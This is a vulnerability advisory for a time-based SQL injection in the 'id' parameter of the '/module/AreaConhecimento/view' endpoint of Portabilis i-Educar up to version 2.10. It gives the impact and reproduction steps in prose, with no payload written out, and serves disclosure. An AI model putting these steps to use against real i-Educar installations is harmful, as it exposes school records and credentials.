Portabilis i-Educar SQL Injection Vulnerability in Area Knowledge Module

A SQL injection vulnerability has been identified in the Portabilis i-Educar application, affecting versions up to 2.10. The issue arises in the '/module/AreaConhecimento/view' endpoint, specifically within the 'id' parameter. This vulnerability allows remote attackers to execute arbitrary SQL commands on the backend database. To exploit this vulnerability, an account with permissions to create or list items in the 'Escola' menu is required.

Impact

Exploitation of this vulnerability allows for unauthorized access to data, including sensitive information such as credentials and personal details. It also enables database enumeration, manipulation of database records, and could lead to a denial-of-service condition by causing time-based delays in server response. Additionally, there is a potential for escalation to remote code execution if this vulnerability is combined with other specific database features.

Reproduction

To reproduce this vulnerability, navigate to 'Escola > Cadastros > Tipos > Regras de Avaliação > Listagem de áreas de conhecimento'. Once there, send a GET request to the '/module/AreaConhecimento/view' endpoint with a crafted 'id' parameter that includes a SQL payload. The server response should be monitored for increased response times, which would indicate successful exploitation of the SQL injection vulnerability.